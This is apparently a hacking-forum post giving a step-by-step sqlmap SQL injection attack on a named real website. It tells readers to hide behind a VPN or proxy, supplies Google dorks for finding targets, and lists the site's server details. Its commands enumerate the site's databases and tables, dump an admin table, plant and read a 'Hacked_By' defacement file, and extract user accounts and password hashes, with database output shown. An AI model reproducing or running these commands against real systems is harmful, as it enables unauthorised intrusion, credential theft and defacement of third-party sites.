Hello All Members!
Injection Tool: sqlmap
Official Page:
http://sqlmap.org
Download Link:
https://github.com/sqlmapproject/sqlmap/zipball/master
Testing: WIndows XP/SP3 , Python 2.7.5
vulnerability Page:
http://www.godwins-law.co.uk/staff.php?id=10'
!!!!! Use OpenVPN OR PROXY !!!!!
Step1. Target
Google Dork: inurl:index.php , inurl:staff.php , inurl:show.php , inurl:login.php , etc...
Target:
http://www.godwins-law.co.uk/staff.php?id=10
Target WebServer Operating System: WIndows 2003
Target WebApplication: ASP.NET , Microsoft IIS 6.0 , PHP 5.2.8
Target BackEndDataBase: MySQL 5.0.0
Step2. DataBase
sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --dbs
--database--
godwins
information_schema
Step3. Table
sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins --tables
--table--
adminhelp
articlecats
articles
contentimages
imagelib
news
pages
staff
Step4. Column & Dump
sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins -T adminhelp --columns
sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins -T adminhelp --dump
Step5. Hacked Text
sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-dest=Hacked_By_sasami_327.txt
sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-read=Hacked_By_sasami_327.txt
Step6. user & password
sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --users --passwords